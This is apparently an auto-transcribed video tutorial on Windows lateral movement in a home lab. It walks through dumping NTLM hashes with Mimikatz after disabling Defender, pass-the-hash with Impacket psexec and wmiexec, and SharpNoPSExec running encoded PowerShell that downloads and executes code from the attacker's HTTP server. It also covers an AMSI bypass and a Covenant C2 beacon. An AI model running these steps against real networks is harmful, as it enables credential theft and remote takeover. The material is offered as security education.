Movement is one of the techniques used from hackers to actually move across a targeted network. This often is done by having a different pair of credentials, having different access rights, and by utilizing the access right, often it's possible to query services which can be forced to execute different paywalls. Now in that case, you requested it, let's be a little bit beginner friendly and showcase how to perform simple lateral movement techniques. A little bit with my environment itself. So this is one of my client Windows machines and I have a lot of machines going on now. We're having the card box where we can simulate attacker sections. We have the command VM which I enjoy for development purposes, so that's why I use it. Then we have the domain controller, of course, another SQL server where we can perform the lateral movement itself, and the pfSense which acts as a router and firewall to the targeted network. Now, since I'm on NAT, I'm not diving into networking and diagnosing and moving on path and tunneling and so on. We're gonna dive right into the lateral movement part. As I mentioned, the lateral movement is often done when attackers have a different pair of credentials for users which are capable of having some elevated actions. Such elevated actions can be write into a specific share, and since we can write to a share, we can use Windows RPC calls to actually create a service which can execute a file which sits on that remote share. First things first, before doing any kind of actually lateral movement, it's often needed to actually get a hold of that user which you want to compromise and lateral move with it. Now, let's use Mimikatz. In this episode, I'm not going to touch of special attacks that can be performed into lateral movement, but I'm going to touch on the basics of the technique itself. So for that case, I'm opening the Firefox there and let me download Mimikatz. So let's just Google for Mimikatz, make sure my Defender is being turned off, so we're not getting any threats. Yep, it is. So let's go to here. Now let's download that as a zip file, since I'm not having Git in there. Looks like I already have it. Never mind, it's good to have it one more time. So I'm gonna open that. I'm gonna go to x64 and copy the mimikatz.exe file into the desktop. Now with that, I can open PowerShell as administrator, go over cd users, my user, which in that case is k2z, then go to desktop and run Mimikatz. Now we can run Mimikatz. Let's do privilege debug and then secure RSA logon passwords, which is gonna dump all the available sessions which are accomplished on that exact machine. Now, since most of the hashes are repeated and most of the hashes are for the machine account itself, we don't really need them unless we have special attack case like resource-based constraint delegation, but for now we just don't really need it. Now, if I scroll a little bit up, we can see the NTLM hash of our K2Z user, so we're gonna use that for authentication, and the cool part is that if the Active Directory environment is allowing NTLM authentication, we don't really need to have that cracked. We can use the hash itself as a password into something called pass the hash. The simplest way of us achieving lateral movement by pass the hash is by using already installed and built-in tools in Kali called Impacket scripts. The Impacket scripts are a set of tools that can help us escalate and attack Active Directory environment, and they have tools for issuing tickets, creating machine accounts, and performing lateral movement. So let me jump into my Kali machine, set up my password, and from here, since I already have the password, I can simply do Impacket psexec. I'm gonna do lsec.local, specify my username, which is K2Z, specify the whole IP address of the machine I want to lateral move into. In that case, that is the SQL server there. Alright, and then just pass the hash. Now, by running that, we can see that we instantly pop up an interactive shell, and if I do who am I, we can see it's anti-authority system. That's because that's how psexec really works, and all the shell it spawns are as system user having system integrity. In a case you want to have a shell from a user you owned, so in that case it's K2Z, it's better to use wmi-exec. So if I remove psexec and specify wmi-exec, we can see the shell looks a little bit different, and if I type who am I, we can see now I am Kel'Thuzad himself. The reason for that is because it uses different services and different way of executing code. So depending on your need, sometimes you may need system, other times you may need a regular user, you can use tools designed only for that purpose. Of course, the Impacket script works with password itself, so if you have the raw plain text password, you just can use it right off the bat. While the tools I just showcased work pretty nice, sometimes they are just not enough. They are not enough in cases where either they are flagged by some kind of AV or EDR, or they are not enough in case where you just don't have a Kali machine running in your target's network. In such cases, we're gonna need something different, and that different thing is called sharp no psexec. I have folded that here. It's a custom made tool designed to perform lateral movement using kind of the similar technique, so let me just get a little bit into the source code. We're not gonna dive that deep because the tool is not that simple, but let's just get a nice overview about how that thing really works. I am always a fan of reviewing source code because it helps you get the foundation of how people think, how they build tools, and how the tools you use generally work. So my strong suggestion would be to guys, all the time you use a tool, dedicate a time to just understand how it really works in a nutshell. Of course, there are tools, they are super complex and you can't just understand them right off the bat, but we're glad that this tool uses C#, which is kind of easy to read and easy to write. So this is the logo I started with, but let's just scroll it a bit up and we can see all the Windows APIs we're gonna use. So they are imported here inside the namespace, inside the class itself. So we have, this should be, I believe, some kind of option class or constructor setting different variables to different parameters, which are here. Then we have the main class, which is called program. In C#, the main class is program, and this is where all the code starts. And here we define a bunch of structs that should explain how the objects should look like in the memory. Then we have a different DLL imports, and genuinely when you see DLL imports, that's how you import a Windows API. So for instance, in that case, we're gonna do change service config, open service, open SE manager, open service config again, query service config, sorry, start service, log on user, and impersonate logged on user. So based on the APIs we import, the code would rotate around them, and we can see about what the code would do. It would be something similar to psexec, so we would need to first authenticate to some machine, then we need to create a service, get a list of services, or use the present one, and then just try to manipulate some of the services since we have most likely the credentials for it. So with that case, we have different functions. So for instance, that one, get service info, I believe is supposed to open services across the target environment, and then just tries to query all the services into determining which one of them can we use and which one of them can we touch. Now, this is the banner function, which just prints the nice banner here, and then we have the print help, which shows us how pretty much we're gonna use the tool. Now we have some sanitize input, which pretty much is designed to fail save the tool itself. We're not gonna touch into that. And then we have the main function itself. The main function is where the code starts. So the main class is called program, the main function is called main. So when the function starts, it's gonna go through here and execute the code from here to bottom. Now the first thing we do is set up the options as shown before, then we parse all the parameters we pass via the command Y interface, with that syntax right there. Then what we do is just log user A, which is an API which is supposed to log in user to a machine, so if you need some help, you just can mark a function, click F1, and that's gonna automatically open PowerShell, Firefox, apologize, and trying to find the API call itself. I'm not sure why it was not found now, but I can try to copy and paste that into Google, and there we go, we have the function right off the bat. The cool thing about Microsoft is that they have a pretty nice documentation about all their functions. So In a nutshell, they are self-explanatory. For instance, log on user A, it's obvious what it does, but on the other hand, there is a documentation about what it expects and how it exactly does the thing it does. After we've been logged on successfully, so there's a check to say if we login was successful or not, and if it was, then we impersonate the logged on user, so we generate a token for it. Then after we generate a token for it, we open SC Manager, we get a handle to the SC Manager of the target system, that's what I believe happens here. Then we get all the services across the target environment, right? And then we try to find a service which we can execute our payload from it. This service, in order to execute our payload, the service should have proper permissions, or we should have proper permission for a specific service. Now, if that's the case, then we can get service info to get a little bit more details about the correct service we want. And with that, we can do start service. So the code from here to here is designed to to generate the payload, pass the payload to the service, and the call start service is actually going to start the service which is supposed to execute our payload. Now the chain is not that complicated when you get it. So in a nutshell, we log into a system, we query its services, we see which service we can get a hand on and with what service we can work. Then we define a payload and force the service to execute our payload. So without further ado, let's jump into action and let's see how that tool really works. In order to compile the tool, I'm using release and x64 to get rid of some metadata, and I can just do Ctrl Shift and B, which is gonna automatically compile the project. I've already done that, so I'm inside no sharp psexec. I'm gonna open the directory bin x64 release, and there is the code. So I can just do Ctrl X, go to my Windows 10 client and paste it right off the bat. Now with that, I am ready to use that, so I can do cd desktop and I can search for already defined command of sharp no psexec. So sharp no psexec, this is my payload, so we have --target, we can specify the target we want, and then we have the payload which is gonna be equal to cmd.exe/c, meaning that we can execute a new command, and then the command to execute is PowerShell .exe and encoded a base64 string. Now, where that base64 string comes from? It comes from my Kali machine. So for instance, here I have a PowerShell profile, and PowerShell is now platform independent, so you can get PowerShell anywhere. And on that I have two functions which are pretty useful. You can feel free to copy them. One of them is called invoke cmd to base64 and then invoke script to base64. So there's a difference between base64ing from native Linux machine using base64 utility and from actual PowerShell syntax, so you can define a different Unicode there. Now with that function, I had no problem to transfer bytes and execute them on different PowerShell sessions, so that's why I use it. To showcase if the lateral movement techniques work, we're gonna build in from the bottom, so the first thing I'm gonna do is open a Python HTTP server. On the next hand side, I'm gonna do invoke cmd to base64 and then define my command, which is gonna be iwr, URI, and then HTTP, and my IP address, which is gonna be 74.134. With that, it's gonna automatically generate the base64 string, and it's already being copied to my clipboard. And if you pay close attention, you're gonna see it's pretty much the same in this one. So if I run this command, let's see what's gonna happen. We open the SC Manager, we get in the service information, we are looking for random service where we have the permissions and can't get a handle to execute our payload. We query these services and most likely stopped on this one. And then we had access denied, so I'm not really sure why that happened. So let me go back to my Kali, let me try another one. So let me see first who am I. So who am I? It's Keltuzat. By no specifying the password or username, it should get your current user, but in that case that's not the case. So let's try sharp no psexec.exe -h to see And this is how we define things. So we need the username. So let's go back to my command and let's do username equals to KO to that. Then password to be equal to my password. All right. And then the domain is gonna be equal to eosec.local. Now let's try it that way. Let's see if we can get a different kind of results. And if I go back to my Kali machine, voila, we had a request. So there was a time when I was testing that before the video, I didn't need to set up my username and password. It was able to get it from the session I'm running on. But if you see access denied, it's most likely you need to do it this way. Now, one thing that I notice about the tool is that I'm not having the opportunity of actually specifying the hash, so I cannot do past the hash. But if I have the password, I can use this without any kind of problems. Now, the point is that we just did a nice invoke web request, but how we can weaponize that? So let's shoot up Covenant. I've already went through how to install Covenant. If you do not know, just make sure to click on top right corner. The video would be there or linked in the description. That's where I showcase the C2, my impressions about it, how to install and basically work with it. So I'm gonna open a new Tmux pane, go into cd opt Covenant, and then I'm just gonna do sudo .net run. Now again, I forgot to do sudo-i, then I have to export .NET system globalization interval to be equal to 1, then get back to the same directory and run .NET run again. That's gonna shoot up Covenant, so we're gonna generate a PowerShell stager beacon, and then we're gonna change that using the no sharp ps execting. So the Covenant seems to be started. I'm gonna open Firefox and then type Covenant, it should be there. Now I believe I have to do sudo vim itsresolve.conf because I need to fix that. It's kind of annoying thing. And now the Covenant is up and running. I can do Kali and my password there again. Then go to listeners and create a new one. So let me just go there to HTTP server, remove that, and now let's go to Covenant. Create a new listener, let's give it just the random name, and the IP address would be 192.168.74.134. Create that, and it should be started automatically. There it is. Now on the grunts, on the launchers actually, we're gonna go over PowerShell and then specify the listener. It's the only one actually, and then we can click generate. After the generate, we're gonna copy the command, and now we need to modify it a little bit. So I'm gonna go over this pane right there, then do vim covenant.ps1 and set paste and paste my command. Now I'm gonna remove the quotes at the beginning and at the end and just alter the command a little bit. Why I need to do it? Because I don't want new PowerShell to appear and just the command itself. So I'm just gonna write that here, and I'm going to do now a different kind of staging. So what I'm going to do is to set up a nice AMSI bypass, and then we can chain that AMSI bypass to get the Covenant beacon. So we can go to AMSI.fail, generate a payload, just a very simple and random one. It's not simple, apologize, it's a random one. So let's copy that and then do vim stage.md. Let's call that md because usually vendors are not happy when they see PowerShell. So set paste that, and then run another statement calling IEX new object net.web client download string, and then specify my IP 192.168.74.134. Let's call that port to be 8080, and then just do covenant.md. Covenant, yeah, I didn't have typo, I believe. So let me move covenant.ps1 to covenant.md, and we have two files, stage.md and covenant.md. So let me just type the Python server, but now hosted on port 8000, and let me just double check the stage parameter. Yeah, it's 8080, so that the Python server would be on 8080. Alright, sweet. Now what we're going to do is to generate another base64 command, which is gonna chain the whole process in getting the scope back. So here, let me do invoke cmd to base64, and now do ix new object net.webClient download string, and then the IP address itself. So this is it, just specify the port to be 8080 and then stage.md. Alright, and close the syntax. Now this is our base64 encoded payload. Now let's try that. This is designed to load and execute stage.md, which is that, and on the bottom of stage.md we just execute the Covenant beacon itself. Nice. So let's test that out. I think it's copied to my clipboard automatically, so let me move onto the client 01 and now just replace the base64 payload with that, and let's give it a go. Now let's observe what's going to happen on our environment. We get the first callback to stage.md, so let me hope that I don't have a type because I'm not seeing the second one. So ix new object net.webClient download string and covenant.md. Did not happen, so I'm not sure if I did a type or not. Never mind, so I have another idea. I'm just going to copy to cat covenant.md. I'm gonna copy that to my clipboard and then vim stage.md and just paste it here. So like that, paste, and that should be enough. So let me try it one more time, so we don't need to stage it one additional time, and let's run it again. So run that, go to Kali, we have go back to this one, let's go to Covenant and hope our grant appear. Doesn't look like to appear again. Now let's try to actually remove the AMSI bypass just for testing purposes. So I'm gonna remove that. Most likely there's a chance that I just broke the PowerShell beacon itself. So let's try without the AMSI bypass. So run that. Now go here, run the lateral movement again, and let's see if we get a, yeah, now we do. So it was something regarding the AMSI bypass itself. I'm really not sure why it was not working and why it was breaking, but we can see that now it works. So this is our beacon, and this is how we can perform lateral movement. Of course, with PowerShell it's easy because you need to just specify the payload in your lateral movement command itself, but if you want to chain different C2 which are not capable of PowerShell, you need to actually go there and maybe route a file to the shell you want to execute, or tweak it and invent some hacky way to perform this stuff. Now here the Covenant beacon should be working, and by running the command who am I, let's see if we're gonna get some output. Yep, we are anti-authority system. So by utilizing our credentials and access right, you were able to laterally move to a system as a system integrity shell. Beside Impacket scripts and no sharp PS exec, there are plenty more tools that allows us to perform lateral movements. Some C2 has their own implementation of such lateral movement techniques. There are even Metasploit modules for that, and many more tools that I'm sure I'm just not aware of. So if you guys plan of me making a video about any other tools, just post them in the comment or hit me up in Discord. With that being said, I enjoy your presence on the channel so much, appreciate every single one of you. Make sure to hit that subscribe button if you already didn't, and if you further appreciate my channel, you can become my Patreon. Wish all the best, expect more, and see you in the next one.